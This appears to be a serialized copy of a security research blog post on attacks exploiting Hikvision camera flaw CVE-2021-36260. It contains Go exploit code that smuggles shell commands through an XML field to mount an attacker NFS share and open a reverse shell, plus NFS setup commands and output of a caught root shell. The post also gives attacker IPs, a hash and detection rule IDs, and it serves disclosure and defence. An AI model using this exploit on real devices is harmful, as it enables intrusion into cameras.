",[1373,38130,20584],{"class":1397},[1373,38132,20615],{"class":4640},[1373,38134,59],{"class":1383},[1373,38136,20638],{"class":7297},[1373,38138,1384],{"class":1383},[1373,38140,38107],{"class":4640},[1373,38142,59],{"class":1383},[1373,38144,38145],{"class":4640},"Rhost",[1373,38147,5437],{"class":1383},[1373,38149,20633],{"class":4640},[1373,38151,59],{"class":1383},[1373,38153,38154],{"class":4640},"Rport",[1373,38156,5437],{"class":1383},[1373,38158,20633],{"class":4640},[1373,38160,59],{"class":1383},[1373,38162,38163],{"class":4640},"SSL",[1373,38165,5437],{"class":1383},[1373,38167,4883],{"class":1387},[1373,38169,37657],{"class":1391},[1373,38171,183],{"class":1387},[1373,38173,11875],{"class":1383},[1373,38175,38176],{"class":1375,"line":6781},[1373,38177,6520],{"emptyLinePlaceholder":237},[1373,38179,38180,38183,38185,38187,38190],{"class":1375,"line":7524},[1373,38181,38182],{"class":4636}," switch",[1373,38184,20633],{"class":4640},[1373,38186,59],{"class":1383},[1373,38188,38189],{"class":4640},"C2Type ",[1373,38191,8904],{"class":1383},[1373,38193,38194,38197,38200,38202,38205],{"class":1375,"line":7530},[1373,38195,38196],{"class":4636}," case",[1373,38198,38199],{"class":4640}," c2",[1373,38201,59],{"class":1383},[1373,38203,38204],{"class":4640},"SimpleShellServer",[1373,38206,11747],{"class":1383},[1373,38208,38209,38211,38213,38216,38218,38220,38223,38225,38227,38229,38231,38233,38235,38237,38240,38242,38244,38246,38249],{"class":1375,"line":7546},[1373,38210,37956],{"class":4640},[1373,38212,59],{"class":1383},[1373,38214,38215],{"class":7297},"PrintfStatus",[1373,38217,1384],{"class":1383},[1373,38219,183],{"class":1387},[1373,38221,38222],{"class":1391},"Sending a reverse shell payload for ",[1373,38224,38048],{"class":37971},[1373,38226,4606],{"class":1391},[1373,38228,37972],{"class":37971},[1373,38230,183],{"class":1387},[1373,38232,5437],{"class":1383},[1373,38234,20633],{"class":4640},[1373,38236,59],{"class":1383},[1373,38238,38239],{"class":4640},"Lhost",[1373,38241,5437],{"class":1383},[1373,38243,20633],{"class":4640},[1373,38245,59],{"class":1383},[1373,38247,38248],{"class":4640},"Lport",[1373,38250,11875],{"class":1383},[1373,38252,38253],{"class":1375,"line":7571},[1373,38254,6520],{"emptyLinePlaceholder":237},[1373,38256,38257],{"class":1375,"line":7598},[1373,38258,38259],{"class":4630}," \u002F\u002F generate a random directory to mount to\n",[1373,38261,38262,38265,38267,38270,38272,38275,38277,38279],{"class":1375,"line":7615},[1373,38263,38264],{"class":4640}," randDir ",[1373,38266,20584],{"class":1397},[1373,38268,38269],{"class":4640}," random",[1373,38271,59],{"class":1383},[1373,38273,38274],{"class":7297},"RandLetters",[1373,38276,1384],{"class":1383},[1373,38278,491],{"class":5467},[1373,38280,11875],{"class":1383},[1373,38282,38283,38286,38288,38291,38293,38296,38298,38301,38303,38305,38307,38309,38311,38313,38315,38318,38320,38322,38325,38327,38329,38331,38334,38336,38338,38341],{"class":1375,"line":7635},[1373,38284,38285],{"class":4640}," mountCommand ",[1373,38287,20584],{"class":1397},[1373,38289,38290],{"class":4640}," dropper",[1373,38292,59],{"class":1383},[1373,38294,38295],{"class":4640},"Unix",[1373,38297,59],{"class":1383},[1373,38299,38300],{"class":7297},"Mountv3Only",[1373,38302,1384],{"class":1383},[1373,38304,38107],{"class":4640},[1373,38306,59],{"class":1383},[1373,38308,38239],{"class":4640},[1373,38310,5437],{"class":1383},[1373,38312,20633],{"class":4640},[1373,38314,59],{"class":1383},[1373,38316,38317],{"class":7297},"GetStringFlag",[1373,38319,1384],{"class":1383},[1373,38321,183],{"class":1387},[1373,38323,38324],{"class":1391},"share",[1373,38326,183],{"class":1387},[1373,38328,15534],{"class":1383},[1373,38330,4883],{"class":1387},[1373,38332,38333],{"class":1391},".\u002F",[1373,38335,183],{"class":1387},[1373,38337,15448],{"class":1397},[1373,38339,38340],{"class":4640},"randDir",[1373,38342,11875],{"class":1383},[1373,38344,38345],{"class":1375,"line":7640},[1373,38346,6520],{"emptyLinePlaceholder":237},[1373,38348,38349],{"class":1375,"line":7648},[1373,38350,38351],{"class":4630}," \u002F\u002F split the exploit into 7 byte chunks that we can append to a local script\n",[1373,38353,38354,38357,38359,38362,38364,38367,38369,38372],{"class":1375,"line":7672},[1373,38355,38356],{"class":4640}," mountSplit ",[1373,38358,20584],{"class":1397},[1373,38360,38361],{"class":7297}," splitByByteSize",[1373,38363,1384],{"class":1383},[1373,38365,38366],{"class":4640},"mountCommand",[1373,38368,5437],{"class":1383},[1373,38370,38371],{"class":5467}," 7",[1373,38373,11875],{"class":1383},[1373,38375,38376],{"class":1375,"line":7688},[1373,38377,6520],{"emptyLinePlaceholder":237},[1373,38379,38380],{"class":1375,"line":7709},[1373,38381,38382],{"class":4630}," \u002F\u002F the exploit space is very small (23 bytes) so break it up over multiple\n",[1373,38384,38385],{"class":1375,"line":7714},[1373,38386,38387],{"class":4630}," \u002F\u002F requests. This will echo to a hard-coded filename (y).\n",[1373,38389,38390,38392,38394,38396,38398,38400,38402,38404,38406,38409,38411,38413,38415,38417,38419,38422,38424,38426,38428,38430],{"class":1375,"line":7722},[1373,38391,9773],{"class":4636},[1373,38393,20610],{"class":4640},[1373,38395,20584],{"class":1397},[1373,38397,37834],{"class":7297},[1373,38399,15969],{"class":1383},[1373,38401,7585],{"class":4640},[1373,38403,5437],{"class":1383},[1373,38405,4883],{"class":1387},[1373,38407,38408],{"class":1391},"\u003Cxml>\u003Clanguage >$(mkdir ",[1373,38410,183],{"class":1387},[1373,38412,15448],{"class":1397},[1373,38414,38340],{"class":4640},[1373,38416,15448],{"class":1397},[1373,38418,183],{"class":1387},[1373,38420,38421],{"class":1391},")\u003C\u002Flanguage>\u003C\u002Fxml>",[1373,38423,183],{"class":1387},[1373,38425,2344],{"class":1383},[1373,38427,7370],{"class":1397},[1373,38429,20662],{"class":4640},[1373,38431,8904],{"class":1383},[1373,38433,38434,38436],{"class":1375,"line":9903},[1373,38435,9896],{"class":4636},[1373,38437,16195],{"class":14985},[1373,38439,38440],{"class":1375,"line":9908},[1373,38441,9861],{"class":1383},[1373,38443,38444,38447,38450,38452,38455,38457,38460,38463],{"class":1375,"line":9913},[1373,38445,38446],{"class":4636}," for",[1373,38448,38449],{"class":4640}," i",[1373,38451,5437],{"class":1383},[1373,38453,38454],{"class":4640}," entry ",[1373,38456,20584],{"class":1397},[1373,38458,38459],{"class":4636}," range",[1373,38461,38462],{"class":4640}," mountSplit ",[1373,38464,8904],{"class":1383},[1373,38466,38467],{"class":1375,"line":9932},[1373,38468,38469],{"class":4630}," \u002F\u002F on the first exploit attempt, overwrite anything that might be in `y`\n",[1373,38471,38472,38475,38477,38479,38481],{"class":1375,"line":9937},[1373,38473,38474],{"class":4640}," shAppend ",[1373,38476,20584],{"class":1397},[1373,38478,4883],{"class":1387},[1373,38480,15038],{"class":1391},[1373,38482,19057],{"class":1387},[1373,38484,38485,38487,38490,38492,38494],{"class":1375,"line":9957},[1373,38486,9793],{"class":4636},[1373,38488,38489],{"class":4640}," i ",[1373,38491,15920],{"class":1397},[1373,38493,5557],{"class":5467},[1373,38495,4765],{"class":1383},[1373,38497,38498,38501,38503,38505,38507],{"class":1375,"line":9962},[1373,38499,38500],{"class":4640}," shAppend ",[1373,38502,5417],{"class":1397},[1373,38504,4883],{"class":1387},[1373,38506,5384],{"class":1391},[1373,38508,19057],{"class":1387},[1373,38510,38511],{"class":1375,"line":15955},[1373,38512,9832],{"class":1383},[1373,38514,38515,38517,38519,38521,38523,38525,38527,38529,38531,38534,38536,38538,38541,38543,38545,38547,38549,38551,38554,38556,38558,38561,38563,38565,38567,38569],{"class":1375,"line":16030},[1373,38516,9793],{"class":4636},[1373,38518,20610],{"class":4640},[1373,38520,20584],{"class":1397},[1373,38522,37834],{"class":7297},[1373,38524,15969],{"class":1383},[1373,38526,7585],{"class":4640},[1373,38528,5437],{"class":1383},[1373,38530,4883],{"class":1387},[1373,38532,38533],{"class":1391},"\u003Cxml>\u003Clanguage >$(echo -n '",[1373,38535,183],{"class":1387},[1373,38537,15448],{"class":1397},[1373,38539,38540],{"class":4640},"entry",[1373,38542,15448],{"class":1397},[1373,38544,183],{"class":1387},[1373,38546,1388],{"class":1391},[1373,38548,183],{"class":1387},[1373,38550,15448],{"class":1397},[1373,38552,38553],{"class":4640},"shAppend",[1373,38555,15448],{"class":1397},[1373,38557,183],{"class":1387},[1373,38559,38560],{"class":1391},"y)\u003C\u002Flanguage>\u003C\u002Fxml>",[1373,38562,183],{"class":1387},[1373,38564,2344],{"class":1383},[1373,38566,7370],{"class":1397},[1373,38568,20662],{"class":4640},[1373,38570,8904],{"class":1383},[1373,38572,38573,38576],{"class":1375,"line":16035},[1373,38574,38575],{"class":4636}," return",[1373,38577,16195],{"class":14985},[1373,38579,38580],{"class":1375,"line":16083},[1373,38581,9832],{"class":1383},[1373,38583,38584],{"class":1375,"line":16098},[1373,38585,9861],{"class":4640},[1373,38587,38588],{"class":1375,"line":16103},[1373,38589,6520],{"emptyLinePlaceholder":237},[1373,38591,38592],{"class":1375,"line":16147},[1373,38593,38594],{"class":4630}," \u002F\u002F execute the script\n",[1373,38596,38597,38599,38601,38603,38605,38607,38609,38611,38613,38616,38618,38620,38622,38624],{"class":1375,"line":16153},[1373,38598,9773],{"class":4636},[1373,38600,20610],{"class":4640},[1373,38602,20584],{"class":1397},[1373,38604,37834],{"class":7297},[1373,38606,15969],{"class":1383},[1373,38608,7585],{"class":4640},[1373,38610,5437],{"class":1383},[1373,38612,4883],{"class":1387},[1373,38614,38615],{"class":1391},"\u003Cxml>\u003Clanguage >$(chmod +x y)\u003C\u002Flanguage>\u003C\u002Fxml>",[1373,38617,183],{"class":1387},[1373,38619,2344],{"class":1383},[1373,38621,7370],{"class":1397},[1373,38623,20662],{"class":4640},[1373,38625,8904],{"class":1383},[1373,38627,38628,38630],{"class":1375,"line":16164},[1373,38629,9896],{"class":4636},[1373,38631,16195],{"class":14985},[1373,38633,38634],{"class":1375,"line":16170},[1373,38635,9861],{"class":1383},[1373,38637,38638,38640,38642,38644,38646,38648,38650,38652,38654,38657,38659,38661,38663,38665],{"class":1375,"line":16187},[1373,38639,9773],{"class":4636},[1373,38641,20610],{"class":4640},[1373,38643,20584],{"class":1397},[1373,38645,37834],{"class":7297},[1373,38647,15969],{"class":1383},[1373,38649,7585],{"class":4640},[1373,38651,5437],{"class":1383},[1373,38653,4883],{"class":1387},[1373,38655,38656],{"class":1391},"\u003Cxml>\u003Clanguage >$(.\u002Fy)\u003C\u002Flanguage>\u003C\u002Fxml>",[1373,38658,183],{"class":1387},[1373,38660,2344],{"class":1383},[1373,38662,7370],{"class":1397},[1373,38664,20662],{"class":4640},[1373,38666,8904],{"class":1383},[1373,38668,38669,38671],{"class":1375,"line":16198},[1373,38670,9896],{"class":4636},[1373,38672,16195],{"class":14985},[1373,38674,38675],{"class":1375,"line":16204},[1373,38676,9861],{"class":1383},[1373,38678,38679],{"class":1375,"line":16210},[1373,38680,6520],{"emptyLinePlaceholder":237},[1373,38682,38683],{"class":1375,"line":16254},[1373,38684,38685],{"class":4630}," \u002F\u002F execute the mounted binary\n",[1373,38687,38688,38690,38692,38694,38696,38698,38700,38702,38704,38707,38709,38711,38713,38715,38717,38719,38721,38723,38725,38727,38729,38731,38733,38735,38737,38739],{"class":1375,"line":18499},[1373,38689,9773],{"class":4636},[1373,38691,20610],{"class":4640},[1373,38693,20584],{"class":1397},[1373,38695,37834],{"class":7297},[1373,38697,15969],{"class":1383},[1373,38699,7585],{"class":4640},[1373,38701,5437],{"class":1383},[1373,38703,4883],{"class":1387},[1373,38705,38706],{"class":1391},"\u003Cxml>\u003Clanguage >$(.\u002F",[1373,38708,183],{"class":1387},[1373,38710,15448],{"class":1397},[1373,38712,38340],{"class":4640},[1373,38714,15448],{"class":1397},[1373,38716,183],{"class":1387},[1373,38718,2180],{"class":1391},[1373,38720,183],{"class":1387},[1373,38722,15448],{"class":1397},[1373,38724,38107],{"class":4640},[1373,38726,59],{"class":1383},[1373,38728,38317],{"class":7297},[1373,38730,1384],{"class":1383},[1373,38732,183],{"class":1387},[1373,38734,22852],{"class":1391},[1373,38736,183],{"class":1387},[1373,38738,2230],{"class":1383},[1373,38740,38741],{"class":1397},"+\n",[1373,38743,38744,38747,38749,38751,38753,38755,38757],{"class":1375,"line":18504},[1373,38745,38746],{"class":1387}," \"",[1373,38748,38421],{"class":1391},[1373,38750,183],{"class":1387},[1373,38752,2344],{"class":1383},[1373,38754,7370],{"class":1397},[1373,38756,20662],{"class":4640},[1373,38758,8904],{"class":1383},[1373,38760,38761,38763],{"class":1375,"line":18517},[1373,38762,9896],{"class":4636},[1373,38764,16195],{"class":14985},[1373,38766,38767],{"class":1375,"line":18529},[1373,38768,9861],{"class":1383},[1373,38770,38771,38774],{"class":1375,"line":18541},[1373,38772,38773],{"class":4636}," default",[1373,38775,11747],{"class":1383},[1373,38777,38778,38780,38782,38784,38786,38788,38791,38793],{"class":1375,"line":18562},[1373,38779,37956],{"class":4640},[1373,38781,59],{"class":1383},[1373,38783,20674],{"class":7297},[1373,38785,1384],{"class":1383},[1373,38787,183],{"class":1387},[1373,38789,38790],{"class":1391},"Invalid payload",[1373,38792,183],{"class":1387},[1373,38794,11875],{"class":1383},[1373,38796,38797,38799],{"class":1375,"line":18578},[1373,38798,4918],{"class":4636},[1373,38800,16195],{"class":14985},[1373,38802,38803],{"class":1375,"line":18583},[1373,38804,4795],{"class":4640},[1373,38806,38807],{"class":1375,"line":18600},[1373,38808,6520],{"emptyLinePlaceholder":237},[1373,38810,38811,38813],{"class":1375,"line":18605},[1373,38812,7340],{"class":4636},[1373,38814,38077],{"class":14985},[1373,38816,38817],{"class":1375,"line":18630},[1373,38818,1855],{"class":4640},[18,38820,38821],{},"Running this exploit drops a shell script onto the Hikvision system. When executed, the script mounts an attacker-controlled NFS share and runs an attacker-controlled executable.",[18,38823,38824,38825,38828,38829,38832],{},"Setting up an NFS share to support this exploit is straightforward. In an ideal world, we’d just use go-nfs",[47,38826,872],{"href":38827},"#user-content-fn-13",", but it doesn’t seem compatible with the Hikvision system. Instead, using ",[886,38830,38831],{},"nfs-kernel-server"," is relatively painless. Just install it and create the share:",[1354,38834,38836],{"className":34366,"code":38835,"language":34368,"meta":219,"style":219},"sudo apt install nfs-kernel-server\nsudo mkdir -p \u002Ftmp\u002Fnfsshare\nsudo chown nobody:nogroup \u002Ftmp\u002Fnfsshare\n",[886,38837,38838,38843,38848],{"__ignoreMap":219},[1373,38839,38840],{"class":1375,"line":1376},[1373,38841,38842],{"class":9383},"sudo apt install nfs-kernel-server\n",[1373,38844,38845],{"class":1375,"line":220},[1373,38846,38847],{"class":9383},"sudo mkdir -p \u002Ftmp\u002Fnfsshare\n",[1373,38849,38850],{"class":1375,"line":1266},[1373,38851,38852],{"class":9383},"sudo chown nobody:nogroup \u002Ftmp\u002Fnfsshare\n",[18,38854,38855,38856,4606],{},"Then add the share to ",[886,38857,38858],{},"\u002Fetc\u002Fexports",[1354,38860,38862],{"className":34366,"code":38861,"language":34368,"meta":219,"style":219},"\u002Ftmp\u002Fnfsshare *(rw,no_root_squash,no_subtree_check)\n",[886,38863,38864],{"__ignoreMap":219},[1373,38865,38866],{"class":1375,"line":1376},[1373,38867,38861],{"class":9383},[18,38869,38870],{},"Then restart services:",[1354,38872,38874],{"className":34366,"code":38873,"language":34368,"meta":219,"style":219},"sudo systemctl restart nfs-kernel-server\nsudo systemctl restart rpcbind\n",[886,38875,38876,38881],{"__ignoreMap":219},[1373,38877,38878],{"class":1375,"line":1376},[1373,38879,38880],{"class":9383},"sudo systemctl restart nfs-kernel-server\n",[1373,38882,38883],{"class":1375,"line":220},[1373,38884,38885],{"class":9383},"sudo systemctl restart rpcbind\n",[18,38887,38888,38889,38891],{},"After this, we can then run the exploit. Below is sample output from our ",[886,38890,16339],{},"-based exploit.",[1354,38893,38895],{"className":31740,"code":38894,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~\u002Finitial-access\u002Ffeed\u002Fcve-2021-36260\u002Fmountvariant$ .\u002Fbuild\u002Fcve-2021-36260_linux-arm64 -e -rhost 10.12.70.228 -lhost 10.12.70.252 -lport 1270\ntime=2025-07-21T16:59:47.167-04:00 level=STATUS msg=\"Starting listener on 10.12.70.252:1270\"\ntime=2025-07-21T16:59:47.168-04:00 level=STATUS msg=\"Starting target\" index=0 host=10.12.70.228 port=80 ssl=false \"ssl auto\"=false\ntime=2025-07-21T16:59:47.168-04:00 level=STATUS msg=\"Sending a reverse shell payload for 10.12.70.252:1270\"\ntime=2025-07-21T16:59:47.795-04:00 level=SUCCESS msg=\"Caught new shell from 10.12.70.228:56329\"\ntime=2025-07-21T16:59:47.795-04:00 level=STATUS msg=\"Active shell from 10.12.70.228:56329\"\nsh: can't access tty; job control turned off\n\n\nBusyBox v1.19.3 (2020-04-07 16:08:04 CST) built-in shell (ash)\nEnter 'help' for a list of built-in commands.\n\n# ps\n PID USER VSZ STAT COMMAND\n1 root 1340 S init\n… truncated …\n 2193 root 0 RW [kworker\u002Fu:2]\n 2575 root 1336 S \u002Fbin\u002Fsh -c tar zxf \u002Fdav\u002F$(.\u002FxqW\u002Fxploit.sh).tar.gz -C\n 2576 root 1340 S {xploit.sh} \u002Fbin\u002Fsh .\u002FxqW\u002Fxploit.sh\n 2578 root 1336 S sh -i\n 2579 root 1340 S telnet 10.12.70.252:1270\n 2580 root 1340 R ps\n",[886,38896,38897,38926,38956,39022,39047,39074,39099,39112,39116,39120,39125,39140,39144,39149,39154,39159,39163,39168,39173,39178,39183,39188],{"__ignoreMap":219},[1373,38898,38899,38902,38905,38908,38911,38914,38917,38920,38923],{"class":1375,"line":1376},[1373,38900,38901],{"class":2206},"albinolobster@mournland:~\u002Finitial-access\u002Ffeed\u002Fcve-2021-36260\u002Fmountvariant$",[1373,38903,38904],{"class":1391}," .\u002Fbuild\u002Fcve-2021-36260_linux-arm64",[1373,38906,38907],{"class":2209}," -e",[1373,38909,38910],{"class":2209}," -rhost",[1373,38912,38913],{"class":5467}," 10.12.70.228",[1373,38915,38916],{"class":2209}," -lhost",[1373,38918,38919],{"class":5467}," 10.12.70.252",[1373,38921,38922],{"class":2209}," -lport",[1373,38924,38925],{"class":5467}," 1270\n",[1373,38927,38928,38931,38933,38936,38939,38941,38944,38947,38949,38951,38954],{"class":1375,"line":220},[1373,38929,38930],{"class":4640},"time",[1373,38932,5417],{"class":1397},[1373,38934,38935],{"class":1391},"2025-07-21T16:59:47.167-04:00",[1373,38937,38938],{"class":4640}," level",[1373,38940,5417],{"class":1397},[1373,38942,38943],{"class":1391},"STATUS",[1373,38945,38946],{"class":4640}," msg",[1373,38948,5417],{"class":1397},[1373,38950,183],{"class":1387},[1373,38952,38953],{"class":1391},"Starting listener on 10.12.70.252:1270",[1373,38955,19057],{"class":1387},[1373,38957,38958,38960,38962,38965,38967,38969,38971,38973,38975,38977,38980,38982,38985,38987,38989,38992,38994,38997,39000,39002,39005,39008,39010,39012,39014,39017,39019],{"class":1375,"line":1266},[1373,38959,38930],{"class":4640},[1373,38961,5417],{"class":1397},[1373,38963,38964],{"class":1391},"2025-07-21T16:59:47.168-04:00",[1373,38966,38938],{"class":4640},[1373,38968,5417],{"class":1397},[1373,38970,38943],{"class":1391},[1373,38972,38946],{"class":4640},[1373,38974,5417],{"class":1397},[1373,38976,183],{"class":1387},[1373,38978,38979],{"class":1391},"Starting target",[1373,38981,183],{"class":1387},[1373,38983,38984],{"class":4640}," index",[1373,38986,5417],{"class":1397},[1373,38988,445],{"class":1391},[1373,38990,38991],{"class":4640}," host",[1373,38993,5417],{"class":1397},[1373,38995,38996],{"class":1391},"10.12.70.228",[1373,38998,38999],{"class":4640}," port",[1373,39001,5417],{"class":1397},[1373,39003,39004],{"class":1391},"80",[1373,39006,39007],{"class":4640}," ssl",[1373,39009,5417],{"class":1397},[1373,39011,5971],{"class":1391},[1373,39013,4883],{"class":1387},[1373,39015,39016],{"class":1391},"ssl auto",[1373,39018,183],{"class":1387},[1373,39020,39021],{"class":1391},"=false\n",[1373,39023,39024,39026,39028,39030,39032,39034,39036,39038,39040,39042,39045],{"class":1375,"line":1852},[1373,39025,38930],{"class":4640},[1373,39027,5417],{"class":1397},[1373,39029,38964],{"class":1391},[1373,39031,38938],{"class":4640},[1373,39033,5417],{"class":1397},[1373,39035,38943],{"class":1391},[1373,39037,38946],{"class":4640},[1373,39039,5417],{"class":1397},[1373,39041,183],{"class":1387},[1373,39043,39044],{"class":1391},"Sending a reverse shell payload for 10.12.70.252:1270",[1373,39046,19057],{"class":1387},[1373,39048,39049,39051,39053,39056,39058,39060,39063,39065,39067,39069,39072],{"class":1375,"line":4692},[1373,39050,38930],{"class":4640},[1373,39052,5417],{"class":1397},[1373,39054,39055],{"class":1391},"2025-07-21T16:59:47.795-04:00",[1373,39057,38938],{"class":4640},[1373,39059,5417],{"class":1397},[1373,39061,39062],{"class":1391},"SUCCESS",[1373,39064,38946],{"class":4640},[1373,39066,5417],{"class":1397},[1373,39068,183],{"class":1387},[1373,39070,39071],{"class":1391},"Caught new shell from 10.12.70.228:56329",[1373,39073,19057],{"class":1387},[1373,39075,39076,39078,39080,39082,39084,39086,39088,39090,39092,39094,39097],{"class":1375,"line":4724},[1373,39077,38930],{"class":4640},[1373,39079,5417],{"class":1397},[1373,39081,39055],{"class":1391},[1373,39083,38938],{"class":4640},[1373,39085,5417],{"class":1397},[1373,39087,38943],{"class":1391},[1373,39089,38946],{"class":4640},[1373,39091,5417],{"class":1397},[1373,39093,183],{"class":1387},[1373,39095,39096],{"class":1391},"Active shell from 10.12.70.228:56329",[1373,39098,19057],{"class":1387},[1373,39100,39101,39104,39107,39109],{"class":1375,"line":4756},[1373,39102,39103],{"class":2206},"sh:",[1373,39105,39106],{"class":1391}," can",[1373,39108,1388],{"class":1387},[1373,39110,39111],{"class":1391},"t access tty; job control turned off\n",[1373,39113,39114],{"class":1375,"line":4768},[1373,39115,6520],{"emptyLinePlaceholder":237},[1373,39117,39118],{"class":1375,"line":4792},[1373,39119,6520],{"emptyLinePlaceholder":237},[1373,39121,39122],{"class":1375,"line":4798},[1373,39123,39124],{"class":1391},"BusyBox v1.19.3 (2020-04-07 16:08:04 CST) built-in shell (ash)\n",[1373,39126,39127,39130,39132,39135,39137],{"class":1375,"line":4806},[1373,39128,39129],{"class":1391},"Enter ",[1373,39131,1388],{"class":1387},[1373,39133,39134],{"class":1391},"help",[1373,39136,1388],{"class":1387},[1373,39138,39139],{"class":1391}," for a list of built-in commands.\n",[1373,39141,39142],{"class":1375,"line":4817},[1373,39143,6520],{"emptyLinePlaceholder":237},[1373,39145,39146],{"class":1375,"line":4825},[1373,39147,39148],{"class":1391},"# ps\n",[1373,39150,39151],{"class":1375,"line":4835},[1373,39152,39153],{"class":1391}," PID USER VSZ STAT COMMAND\n",[1373,39155,39156],{"class":1375,"line":4843},[1373,39157,39158],{"class":1391},"1 root 1340 S init\n",[1373,39160,39161],{"class":1375,"line":4849},[1373,39162,36589],{"class":1391},[1373,39164,39165],{"class":1375,"line":4877},[1373,39166,39167],{"class":1391}," 2193 root 0 RW [kworker\u002Fu:2]\n",[1373,39169,39170],{"class":1375,"line":4915},[1373,39171,39172],{"class":1391}," 2575 root 1336 S \u002Fbin\u002Fsh -c tar zxf \u002Fdav\u002F$(.\u002FxqW\u002Fxploit.sh).tar.gz -C\n",[1373,39174,39175],{"class":1375,"line":4931},[1373,39176,39177],{"class":1391}," 2576 root 1340 S {xploit.sh} \u002Fbin\u002Fsh .\u002FxqW\u002Fxploit.sh\n",[1373,39179,39180],{"class":1375,"line":4947},[1373,39181,39182],{"class":1391}," 2578 root 1336 S sh -i\n",[1373,39184,39185],{"class":1375,"line":4952},[1373,39186,39187],{"class":1391}," 2579 root 1340 S telnet 10.12.70.252:1270\n",[1373,39189,39190],{"class":1375,"line":6776},[1373,39191,39192],{"class":1391}," 2580 root 1340 R ps\n",[18,39194,39195,39196,1554,39198,39200],{},"Here you can see that exploitation happens, basically, instantly. Much faster than using ",[886,39197,37685],{},[886,39199,22966],{}," to drop the payload.",[1920,39202,39204],{"id":39203},"more-on-in-the-wild","More On In The Wild",[18,39206,39207,39208,39211],{},"Curiously, the attacker’s exploit doesn't work on our test Hikvision camera. The exploit (greatly) overruns the size limitation imposed by the vulnerable binary. Upon examining the binary, we found that the command injection must respect a strict 0x1f (31-byte) space restriction enforced by a ",[886,39209,39210],{},"snprintf"," call.",[18,39213,39214],{},"Below is a Ghidra screenshot of the decompiled function illustrating this limitation:",[18,39216,39217],{},[68,39218],{":width":10862,"alt":39219,"src":39220},"Davinci in Ghidra","\u002Fblog\u002Fhikvision-mount-shell\u002Fghidra.png",[18,39222,39223,39224,39227,39228,39230,39231,59],{},"Presumably, there is a subset of firmware that uses ",[886,39225,39226],{},"sprintf"," instead of ",[886,39229,39210],{},", and the attacker has limited themselves to this subset of victims. We do believe that their exploit must work somewhere, though, because we can see their infrastructure on Shodan",[47,39232,39234],{"href":39233},"#user-content-fn-14","14",[18,39236,39237],{},[68,39238],{":width":10862,"alt":39239,"src":39240},"Available port mapper","\u002Fblog\u002Fhikvision-mount-shell\u002Fportmapper-shodan.png",[18,39242,39243,39244,39247],{},"The attacks we observed originated from 195.3.221[.]137. Our friends over at GreyNoise",[47,39245,28534],{"href":39246},"#user-content-fn-15"," associate this IP address with a handful of other CVEs as well. Additionally, we linked this attacker to payload delivery from these IP addresses: 31.59.40[.]187, 45.125.66[.]79, 87.121.84[.]34, 141.11.62[.]222, 220.158.232[.]99.",[18,39249,39250,39251,39255,39256,39260],{},"Examining a couple of these hosts reveals some real oddball payload delivery mechanisms",[47,39252,39254],{"href":39253},"#user-content-fn-16","16",". However, not at all oddly, the served binaries appear to be pretty standard Mirai-like",[47,39257,39259],{"href":39258},"#user-content-fn-17","17"," payloads.",[18,39262,39263],{},[68,39264],{":width":10862,"alt":39265,"src":39266},"Odd payload delivery","\u002Fblog\u002Fhikvision-mount-shell\u002Fweird-shodan.png",[1920,39268,39270],{"id":39269},"indicators-and-detections","Indicators and Detections",[18,39272,32391,39273,39276],{},[47,39274,1245],{"href":1243,"rel":39275},[51]," customers have access to Suricata and Snort rules that detects exploitation of all the aforementioned exploited CVEs:",[307,39278,39279,39288],{},[310,39280,39281],{},[313,39282,39283,39285],{},[316,39284,319],{},[316,39286,39287],{},"VulnCheck SID",[336,39289,39290],{},[313,39291,39292,39294],{},[341,39293,37587],{},[341,39295,39296],{},"12700001",[18,39298,39299],{},"Additionally, the following details of the activity we observed should help others detect and block this activity in the future.",[61,39301,39303],{"id":39302},"source-of-exploitation","Source of exploitation",[22,39305,39306],{},[25,39307,39308],{},"195.3.221[.]137",[61,39310,39312],{"id":39311},"malware-hosting-callback-sites","Malware Hosting & Callback Sites",[22,39314,39315,39318,39321,39324,39327],{},[25,39316,39317],{},"31.59.40[.]187",[25,39319,39320],{},"45.125.66[.]79",[25,39322,39323],{},"87.121.84[.]34",[25,39325,39326],{},"141.11.62[.]222",[25,39328,39329],{},"220.158.232[.]99",[61,39331,39333],{"id":39332},"sha-1-hashes","SHA-1 Hashes",[307,39335,39336,39346],{},[310,39337,39338],{},[313,39339,39340,39343],{},[316,39341,39342],{},"Filename",[316,39344,39345],{},"SHA-1",[336,39347,39348],{},[313,39349,39350,39353],{},[341,39351,39352],{},"a5le1w",[341,39354,39355],{},"48d2c2c68fa0bd44eb70c1a6cf572406442b289fb6030e946f0530ce6f9fad98",[1920,39357,202],{"id":201},[18,39359,39360,39361,1246,39365,5437,39368,1255,39371,59],{},"The VulnCheck team is always on the lookout for new exploitation in the wild. For more research like this, see our blogs, ",[47,39362,39364],{"href":35920,"rel":39363},[51],"The Linuxsys Coinminer",[47,39366,36637],{"href":36635,"rel":39367},[51],[47,39369,35931],{"href":35927,"rel":39370},[51],[47,39372,22211],{"href":22207,"rel":39373},[51],[18,39375,33941,39376,33945,39379,1240,39382,982,39385,1260],{},[47,39377,1233],{"href":10806,"rel":39378},[51],[47,39380,1239],{"href":1237,"rel":39381},[51],[47,39383,1245],{"href":1243,"rel":39384},[51],[47,39386,216],{"href":1258,"rel":39387},[51],[1920,39389,2850],{"id":2849},[61,39391,36665],{"id":36664},[1789,39393,39394,39402,39410,39417,39425,39433,39441,39449,39458,39467,39476,39485,39494,39503,39512,39521,39530],{},[25,39395,39396,10515,39400],{},[47,39397,39398],{"href":39398,"rel":39399},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=html%3A%22%2Fdoc%2Fpage%2Flogin.asp%3F_%22+%2B%22Server%22%2C%22ETag%22%2C%22Version%22",[51],[47,39401,36677],{"href":36676},[25,39403,39404,10515,39408],{},[47,39405,39406],{"href":39406,"rel":39407},"https:\u002F\u002Fmedia.defense.gov\u002F2022\u002FOct\u002F06\u002F2003092365\u002F-1\u002F-1\u002F0\u002FJoint_CSA_Top_CVEs_Exploited_by_PRC_cyber_actors_.PDF",[51],[47,39409,36677],{"href":36686},[25,39411,39412,10515,39415],{},[47,39413,37484],{"href":37484,"rel":39414},[51],[47,39416,36677],{"href":36695},[25,39418,39419,10515,39423],{},[47,39420,39421],{"href":39421,"rel":39422},"https:\u002F\u002Fwww.forescout.com\u002Fblog\u002Fdoj-moobot-botnet-commandeered-by-russian-apt28-analysis-of-attacks-against-routers-and-malware-samples\u002F",[51],[47,39424,36677],{"href":36704},[25,39426,39427,10515,39431],{},[47,39428,39429],{"href":39429,"rel":39430},"https:\u002F\u002Fviz.greynoise.io\u002Ftags\u002Fhikvision-ip-camera-rce-attempt?days=90",[51],[47,39432,36677],{"href":36713},[25,394